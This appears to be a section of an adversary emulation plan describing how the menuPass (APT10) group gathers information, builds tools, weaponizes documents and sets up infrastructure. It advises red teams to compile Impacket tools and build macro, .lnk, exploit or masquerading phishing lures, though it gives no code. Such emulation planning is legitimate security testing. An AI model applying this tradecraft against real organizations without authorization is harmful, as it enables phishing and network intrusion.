- Emulating reconnaissance and resource development such as information gathering, capability development, and weaponization.
- This step is not necessary to remain operationally representative but should be considered if you intend to attain initial access via phishing.
- Step 1 - Information Gathering
- Step 2 - Building Capabilities
- Step 3 - Weaponization
- Step 4 - Establish and Maintain Infrastructure
It is difficult to determine precisely how menuPass prepares for an operation. We can however, assume that menuPass actors, after carefully selecting a target, perform some degree of technical, social, and organizational information gathering.4 This may also be the stage where menuPass actors acquire publicly available documents from the organization they intend to target, for later weaponization.4 They use the information from these efforts to identify individuals to be targeted and develop pretexts to be used in social engineering (phishing) attacks.4 If you intend to phish, this is the time to identify targets, develop pretext, and collect documents for weaponization.
menuPass is reported to have used both custom and publicly available tools. This is the appropriate time to identify the C2 framework you will be using, select exploits (if you intend to use them), generate payloads, compile and rename tools. menuPass is reported to have made use of several tools from the Impacket Suite.7 Tools like atexec.py, secretsdump.py, and psexec.py should be compiled into executables using a python compiler. You may also elect to use the compiled binaries here.
menuPass is reported to have weaponized documents discovered during information gathering that were perceived to have been of interest to the intended target. These documents would be weaponized with either an exploit or a macro that would inject tactical malware such as ChChes, EvilGrab, or Koadic. The purpose of using a tactical implant during delivery is to mimimize the risk to, and later correlation with, the strategically emplaced sustained implants used for persistence at a later stage in the operation. menuPass is widely reported to have weaponized these email messages in one of four ways:
- Macro
- .lnk file
- Exploit
- Masquerading
menuPass actors are widely reported to have weaponized password protected MS Word/Excel documents with embedded VBA macros.9 After authenticating, the intended recipient will be prompted to "enable content/macros." If enabled, the macro typically dropped files to a temp folder, decoded, executed, and deleted them. This execution resulted in DLL sideloading and the subsequent establishment of C2 on the infected host.8 9
menuPass is also reported to have attached zip files that contained .lnk files. When executed, the .lnk file would invoke the command prompt and use PowerShell to download and execute another PowerShell script.4 7 This script was responsible for situating a tactical implant in memory.4 7 11 20 24
menuPass may have weaponized documents with exploits that targeted vulnerabilities in Microsoft products.15 16 These exploits were responsible for achieving arbitrary code execution and subsequently downloading and situating a tactical implant like Koadic into memory.15 16
The final method of observed weaponization is masquerading. menuPass is reported to have attached digitally signed versions of ChChess and other tactical implants to email messages and modified the icon of the attachment to reflect that of a Microsoft Word document.1